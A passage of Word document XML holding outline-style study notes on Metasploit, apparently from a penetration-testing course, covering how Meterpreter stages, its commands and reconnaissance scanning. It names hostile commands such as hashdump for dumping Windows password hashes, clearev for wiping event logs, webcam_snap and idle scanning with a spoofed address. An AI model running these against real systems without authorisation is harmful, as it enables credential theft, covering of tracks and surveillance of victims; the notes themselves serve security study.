        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>view hash dumps with loot command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A479D46" w14:textId="279F6321" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>loot -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AABA10" w14:textId="5948320D" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B50CD1" w14:textId="5B7DCFC2" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>uses in-memory DLL injection stagers and extended over network at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049825EA" w14:textId="589661E2" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>uses stager socket and is a Ruby client-side API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C35F40B" w14:textId="6922CDF5" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>How Meterpreter Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774415AE" w14:textId="698174CB" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>target executes initial stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A7A85" w14:textId="131EFB90" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>stager loads DLL prefixed with Reflective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A574FE" w14:textId="3A6DD054" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter core initializes TLS/1.0 link over socket and sends GET to attacker Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE0A19" w14:textId="43FFE999" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter loads extensions, stdapi and load priv if module gives admin rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB171AA" w14:textId="7BE8F038" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Design Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32547DC5" w14:textId="659D639B" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>stealthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25929D" w14:textId="7325ADD1" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>powerful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A2058" w14:textId="45C45DA4" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>extensible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949488D" w14:textId="474D43FE" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A364EAC" w14:textId="2BBCE6F0" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F45B0F" w14:textId="6B2CEDFD" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>background – returns user to msf prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B303F0" w14:textId="5AB03A4B" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>interact with session again with sessions -i &lt;number&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B94050" w14:textId="408B800C" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC2B72" w14:textId="33FB745A" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>cd and pwd – change and display current working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AB6BB3" w14:textId="5D2E534D" w:rsidR="0005276B" w:rsidRDefault="0005276B" w:rsidP="0005276B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use \ when navigating folders that have spaces in names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E8F4E" w14:textId="76FC4913" w:rsidR="0005276B" w:rsidRDefault="0005276B" w:rsidP="0005276B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ex. cd Program\ Files\ (x86)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39680A61" w14:textId="13F71E84" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>clearev – clears application, system, and security logs in a windows system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5A5B70" w14:textId="207E8805" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>download – downloads file from remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134F72B" w14:textId="2C0B3A46" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>uses double slashes in path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C769DE" w14:textId="22F68A14" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>edit – opens file located in target host via vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671BD99C" w14:textId="57F98289" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A11AA72" w14:textId="4486E25D" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6E4AD" w14:textId="773FA6F2" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>hashdump – dump contents of SAM database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF47711" w14:textId="311E3021" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>run post/windows/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29395A" w14:textId="4B355CD5" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>idletime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59372C1F" w14:textId="7F8B5C0C" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712F56FC" w14:textId="144C3E25" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lpwd and lcd – display and change local working directory, respectively. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8D8FF" w14:textId="7175A287" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E91672" w14:textId="0576E21E" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>migrate – migrate to another process on the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD5F1B" w14:textId="69EB013A" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ex. run post/windows/manage/migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779AFBFD" w14:textId="4F390CA9" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ps – list of running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA78111" w14:textId="6425089D" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>resource – execute meterpreter instructions located inside a text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC85EC0" w14:textId="2DE4799C" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>executed in line sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A1536" w14:textId="47C16824" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C51AC5" w14:textId="0087F805" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B429481" w14:textId="0E54579A" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B167AA" w14:textId="50B4D052" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use double slashes in path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8BA99" w14:textId="33F70814" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>webcam_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDAC6D" w14:textId="3DFA973E" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>webcam_snap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188FB17" w14:textId="7E4B2575" w:rsidR="00425B0D" w:rsidRDefault="00425B0D" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Python Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8FA75" w14:textId="677310C9" w:rsidR="00425B0D" w:rsidRDefault="003F7CB3" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>load python command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457DFC9" w14:textId="742CDBEF" w:rsidR="003F7CB3" w:rsidRDefault="003F7CB3" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE6532" w14:textId="6874E160" w:rsidR="003F7CB3" w:rsidRDefault="003F7CB3" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>python execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F71D3B" w14:textId="063B2B89" w:rsidR="003F7CB3" w:rsidRDefault="003F7CB3" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-r switch for passing parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701E1D1" w14:textId="3BF6BE66" w:rsidR="003F7CB3" w:rsidRDefault="003F7CB3" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>INFORMATION GATHERING IN METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3186A" w14:textId="51FE3609" w:rsidR="00F51289" w:rsidRDefault="00447048" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Preparing Metasploit for Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206BD037" w14:textId="39380E76" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RHOSTS can take IP ranges, CIDR Rangers, and other ranges separated by commas as well as line-separated host list files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F8D06" w14:textId="79B3DB70" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>THREADS – under 16 on Win32, under 200 on Cygwin, and up to 256 on Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F64C6E" w14:textId="43B64C0A" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NMAP &amp; DB_NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FE2BD" w14:textId="3731F752" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>runs nmap against targets, storing results in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E9D9B0" w14:textId="101076AE" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>all three forms of output with -oA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5B698" w14:textId="5A5415B5" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>then issue db_import command to populate Metasploit db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D19A24" w14:textId="0E29DB43" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run with same options as one would in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD5248" w14:textId="267A969F" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PORT SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F11E0A" w14:textId="29A84634" w:rsidR="00447048" w:rsidRDefault="00447048" w:rsidP="00447048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search portscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799F9A1" w14:textId="436D79BB" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SMB version Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3D525" w14:textId="3493AFB0" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>scanner/smb/version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7C3DD" w14:textId="6FC36AD9" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IDLE Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E70C21" w14:textId="1068C433" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>stealthy scanning of a target while spoofing the IP address of another host on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B967F" w14:textId="18035714" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>must first locate host on network that is idle and uses IPID sequences of Incremental or Broken Little-Endian Incremental</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5330692A" w14:textId="1981B07E" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>scanner/ip/ipidseq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5C94D6" w14:textId="37EBD984" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HUNTING FOR MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0480FB" w14:textId="203B1B01" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search mssql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687ADF0" w14:textId="1269B2AB" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
